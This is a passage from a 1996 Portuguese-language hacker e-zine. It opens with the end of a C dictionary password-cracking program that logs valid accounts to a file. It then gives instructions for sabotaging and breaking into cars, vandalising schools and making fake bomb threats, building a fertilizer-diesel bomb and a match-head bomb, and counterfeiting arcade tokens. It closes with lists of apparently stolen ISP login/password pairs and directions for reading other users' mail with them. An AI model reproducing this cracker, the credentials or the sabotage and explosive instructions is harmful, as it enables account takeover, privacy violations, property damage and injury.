passwords, if dictionary filename is NULL, ignore this operation */ void do_dict( void ) { FILE *fp; char buff[WORDSIZE], temp[2]; int c; strcpy(buff, ""); strcpy(temp, ""); if (dict == NULL) exit(0); if ((fp = fopen(dict, "r")) == NULL) { printf("Error opening dictionary file\n"); exit(0); } rewind(fp); while ((c = fgetc(fp)) != EOF) { if ((c != ' ') || (c != '\n')) { strcpy(temp, ""); sprintf(temp, "%c", c); strncat(buff, temp, 1); } if (c == '\n') { if (buff[0] != ' ') try_word(buff); strcpy(buff, ""); } } fclose(fp); } /* Process the word to be used as a password by stripping \n from it if necessary, then use the pwdauth() function, with the login name and word to attempt to get a valid id & password */ void try_word( char pw[] ) { int pwstat, i, pwlength; char temp[2], buff[WORDSIZE]; strcpy(buff, ""); pwlength = strlen(pw); for (i = 0; i != pwlength; i++) { if (pw[i] != '\n') { strcpy(temp, ""); sprintf(temp, "%c", pw[i]); strncat(buff, temp, 1); } } if (strlen(buff) > 3 ) { printf("Trying : %s\n", buff); if (pwstat = pwdauth(logname, buff) == NULL) { printf("Valid Password! - writing details to 'data'\n"); write_details(buff); if (strcmp(mode, "f") == NULL) exit(0); } } } /* If valid account & password, store this, along with the accounts uid, gid, comment, homedir & shell in a file called 'data' */ void write_details( char *pw ) { FILE *fp; if ((fp = fopen(OUTFILE, "a")) == NULL) { printf("Error opening output file\n"); exit(0); } fprintf(fp, "%s:%s:%d:%d:", logname, pw, uid, gid); fprintf(fp, "%s:%s:%s\n", comment, homedir, shell); fclose(fp); } ---CORTE AQUI----------------------------------------------------------- Bom... pra compilar isso escreva: $ gcc shcrack.c -o shcrack Ou tente! $ acc shcrack.c -o shcrack Isso pode variar dependendo do seu compilador. }-===============================[chain]===============================-{ 9-) ANARCHY ~~~~~~ Como mandar um carro para o inferno! ---------------------------------------------- Existem mil maneiras de destruir um carro mas lembre-se que isso pode ser divertido para voce, destrutivo para alguem e dificil dos policiais pegar. - Coloque uma bomba de CO2 perto do tanque de gasolina. - Coloque sujeira, acucar ( esse e´ bom ), uma bolinha de ping-pong ou al- guma coisa que dissolva no tanque de gasolina. - Plastico deforma e dilue dentro do tanque. O resultado final e dificul- dade de injetar gasolina. Causando possivelmente a troca da valvula. - Uma boa e coloca, pedras, bananas, alguma coisa que vai tampar dentro do cano de descarga. * Use um pedaco de pau para empurrar para dentro. - Coloque um fio comprido no tanque de gasolina e acenda ele. - Roube a chave, tire uma copia, coloque ela no lugar novamente e roube o som do carro. - Arrombe o carro. Corte um pedacao de metal fino parecido com o desenho: Ú-Ä¿ OBS.:VEJA O DESENHO COM MODO TERMINAL PARA ENTENDER ³ ³ ³ ³ ³ ³ ³ ³ ³ ÚÙ ³ À¿ ÀÄÄÙ Faca a operacao do lado de fora do carro. Coloque do lado de fora do vi- dro forcando o cabo o qual vai desbloquear a porta. Essa tecnica e conhe- cida como SLIM JIM. Agora voce pode roubar o som, equalizador, detector de radar. Dica: Para destruir o interior do carro jogue um cachorro ou um gato. Um pato tambem serve por nao ter bons habitos de higiene. - Expelhos restrovisores sao muito facil de ser arrancados. Geralmente empurrando do lado expelhado eles quebram. - Faca uma bola de DUREPOX com 3 ou 4 pregos, coloque em baixo do pneu. - Pode tambem usar um anel para arranhar as portas. Voce odeia a sua escola? ---------------------------- by HaphazarD - Brazil - Global Domination inc. - Realmente a minha favorita e passar cola ( melhor usar cola de sapatei- ro ) nas fechaduras da entrada e por tudo onde for possivel. - Voce pode tambem colocar uma bomba no banheiro, ou simplesmente colocar uma falsa bomba no banheiro, certamente eles terao que investigar e sus- penderao as aulas naquele dia. - Peque um pouco de potassio puro ou sodio puro, coloque isso em uma capsu- la e manda embora com a descarga do banheiro ( cheiro podre! ) - Coloque uma granada com cigarro no hall de entrada! Uma bomba normal com pavio de cigarro, que demora em media 15 minutos para explodir, enquando voce esta na sua sala de aula e vai ouvir o barrulho junto aos seus ami- gos. - Roube senhas ou chaves de computadores. Ou roube o cartao de 80 colunas que tem dentro dos IBMs. - Mande uma carta para sua escola com um disco de 1.2 ou um de 1.44, ( segredo: coloque dentro do disco pedacos pequenos de imans ). Para pa- recer real coloque uma etiqueta bonita e diga na carta que e' um novis- simo anti-virus que esta sendo mandado para todas as escolas. Se preciso falsifique o simbolo do governo do estado. - Jogue seu chiclete no carpete da biblioteca ou alguma coisa que grude bastante. Fique cuidando os auxiliares de disciplina chorarem. - Pinte no murro da escola que o diretor e' facista. - Coloque uma batata no cano de descarga do diretor. - Pegue um virus em uma BBS e infecte os computadores deles. De preferencia se tiver Word ou Excel... argg.... - Use um clips prendendo-o com uma borracha. ( para nao ser eletrocutado ) coloque ele na tomada, a maneira mais facil de queima-la. Como fazer uma bomba de fertilizante --------------------------------------------- Ingredientes: - Jornal - Fertilizante ( escolha o tipo quimico ) - Algodao - Diesel ( combustivel ) Faca um montinho de jornal e coloque um pouco de fertilizante dentro. Coloque algodao sobre ele e entao ensope o algodao com o diesel. Acenda e depois corra como voce nunca correu antes. A explosao é violen- ta portanto nao faca isso em ambiente fechados. Bola de tenis bomba --------------------- Ingredientes: - Milhoes de cabeca de palito - Uma bola de tenis - Uma faca bem afiada - Fita bem forte Depois de arrancar uma tonelada de cabeca de palito de fosforo corte um PEQUENO buraco em uma bola de tenis. Encha a bola com as cabecas de palitos ate nao ter mais espaco nenhum. Fique certo que isso e´muito legal mesmo! Bom, quando voce ver algum amigo andando na rua jogue nele. Ele vai le- var o maior susto com o estouro. Como jogar fliperama de graca ------------------------------ Ingredientes: - Tampas de garrafa - Vela branca grossa - Faca bem afiada - Uma ficha de fliperama original Corte a vela em pequenas rodelas parecidas com a ficha. Amasse bem as tampinhas de modo que fiquem muito finas, e entao coloque as laminas metalicas dentro das da vela. Nao esqueca de dar o formato das entradas moldados na cera entao deixe elas no refrigerador por umas 5 horas ate ficar bem duras. }-===============================[chain]===============================-{ 10-) CARTAS ~~~~~~ Nao tem carta nao, simplesmente pelo fato de que estamos comecando, entao se voce tem alguma duvida, comentario, critica, dica ou mesmo quer fazer parte da equipe que vai comecar a distribuir nossa revista entre em conta- to com: AciDmuD - acidmud@thepentagon.com VooDoo - voodoo@deathsdoor.com HaphazarD - por minha parte falar sobre anarchy nao darei meu e-mail Para que sua BBS receba sempre um exemplar primeiro que os outros escreva-nos Prometemos publicar todo material que nos for enviado, claro depois de avali- ado. Tambem nao vamos colocar lixo e besteiras... Se voce achar algum erro em nosso material escreva-nos por favor. Sua participacao e'muito importante para nos, pois soh assim continuaremos com nosso zine. Voce pode nos encontrar tambem no canal #hackers e #bluebox nos servidores de irc brasileiros. ex: irc.kanopus.com.br e irc.bsi.com.br AVISO: Nao distribua essa revista para pessoas que trabalhem em provedores. *************************************************************************** BONUS EXTRA --------------------------------- senhas de provedores *************************************************************************** (c)1996 Reg. by AciDmuD & VooDoo Global Domination Inc. Cortesia de AciDmuD e VooDoo servindo a comunidade hacker e contribuindo com a DESTRUICAO dos provedores Obs.: Provedores com precos abusivos. OnLy! E'... pra ver como nos somos generosos. Ai estao algumas senhas de dois grandes provedores brasileiros, um de Sao Paulo e outro de Joinville -SC. Com essas senhas alem de acessar a inet de graca voce pode ler o mail de outras pessoas somente trocando a configuracao do seu software de mail. Tipo... substitua onde diz: seu.provedor.com.br por kanopus.com.br Onde tem o login voce deve colocar o novo login com sua respectiva senha. Pode usar o soft de telnet para acessar a esses users. Onde for netville use: netville.com.br Para ler os mails escreva no prompt do telnet. $ mail Vai aparecer uma lista que voce pode acessar por meio dos numeros. ----------------------------------------------------------------------- SE SEU NOME APARECE NA LISTA ABAIXO NAO SE OFENDA. ALEM DE VOCE SER PES- SIMO NA ESCOLHA DA SENHA SEU PROVEDOR E' UMA M3RD4.... ----------------------------------------------------------------------- ---->>> Mes que vem tem as senhas da ELOGICA e da BRAZNET <<<----- - KANOPUS - LOGIN SENHA ----- ----- help help funcao.help help gr3350 123 fwa 1234 gr2502 12345 gr4240 1961 niki 1963 wellner 1978 c.surek 1996 danielbr zool anafonso zool veralm zool agenor agenor apsoft alex mggatech arcadia axel axel uteste banana demo15 banana artes banana viana behrens farinha brasilia nr7pcmso cad carolina carolina cecilia cecilia nepomoceno claudio gr5035 claudio gr6000 claudio costa costa customer customer dag dag danielle danielle ecg840 deborah teodoro digital dgavden duncan eliane eliane email email reginato emilia harbar eugenio fernando fernando florinda florinda sandor gabriel thomaz guipar helio helio siqueira hendrix hermes hermes clsb ibm mruiz irina hideko iris jere jere wap julio hell joplin grios jessi uruzinho jesus grios jessi - NETVILLE - LOGIN SENHA ----- ----- agenciaa public acf01 andre baf 1950 peters 1960 homke 1994 ivansky 1996 aro 1998 lineu alexia garcia aline jba ana guido andrey petit angelico cetil arosa jardim arte eder base acs brenda marquiot bruna fgomes cardinal adelar carla profit carlos cboff carmem eydiniz carol wlau carol schulz change lula cherry hahnte chicago shb cris dminatti data festugat debi cfzucco debora raso denis adelor diego grafos dino magno disney igorz flora brach floyd marias fred anaclara gabriel mserv gabriel blinz golf ascensao grith langsch honda shiino honda wiletrup honda peninha jake kids joshi mrmobius jumar labirint karl fabiola lara baptista laura dornel lili like2net net rhl2net odessa cdsanjos palma prf2net paulo psb01 pedro lotario perry spiazera pia ruben raquel maine rock nucleo rodrigo scarlet scarlet edukato dudu dopke earth polido edna aerton elaine bragam silvio manz fana cordeaca timmy flaps tito datasul transfer jbone22i valdivia deli viktoria smachado viper ruwan wizard sasse wolfgang matheus aloha berg berg preprint bureau cristaos call hansa cargo momento chosse airton cinema claudia clad simetria clash jms disco danca festival *************************************************************************** BONUS EXTRA --------------------------------- senhas de provedores *************************************************************************** - SE QUISER QUE A REVISTA CONTINUE ESCREVA-NOS, ATENDEREMOS A TODOS - - AGUARDEM - EM BREVE - O PROXiMO NUMERO DA SUA REViSTA HACKER - AXUR 05 - - = = = DiA 01 De FEVEREiRO = = = - EM TODAS AS BBSz UNDERGROUND